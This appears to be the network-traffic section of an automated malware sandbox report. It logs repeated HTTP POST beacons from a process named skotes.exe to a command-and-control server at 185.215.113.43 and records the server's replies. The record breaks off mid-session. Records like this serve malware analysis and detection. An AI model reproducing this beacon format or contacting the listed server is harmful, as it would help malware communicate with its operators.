                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:23.554280043 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:23 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    17192.168.2.550070185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:25.295483112 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:26.627410889 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:26 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    18192.168.2.550073185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:28.263384104 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:29.654611111 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:29 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    19192.168.2.550075185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:31.415364981 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:32.802968979 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:32 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    20192.168.2.550077185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:34.430207014 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:35.911736965 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    21192.168.2.550079185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:37.657495975 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:39.048274040 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:38 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    22192.168.2.550081185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:40.685340881 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:42.081556082 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    23192.168.2.550082185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:43.813352108 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:45.190100908 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:44 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    24192.168.2.550083185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:46.828730106 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:48.176667929 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:47 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    25192.168.2.550085185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:49.953932047 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:51.315826893 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    26192.168.2.550087185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:52.953731060 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:54.389008045 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:54 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    27192.168.2.550090185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:56.141918898 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:57.583847046 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    28192.168.2.550092185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:13:59.220616102 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:00.610451937 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:00 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    29192.168.2.550094185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:02.358969927 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:03.745052099 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:03 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 1 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    30192.168.2.550096185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:05.378355026 CET310OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 156
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39
                                                                                                                                                                                                                                                                                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:06.770081997 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:06 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    31192.168.2.550098185.215.113.43804500C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:08.515795946 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                    Host: 185.215.113.43
                                                                                                                                                                                                                                                                                    Content-Length: 4
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                    Data Ascii: st=s
                                                                                                                                                                                                                                                                                    Nov 21, 2024 22:14:09.905498981 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:14:09 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
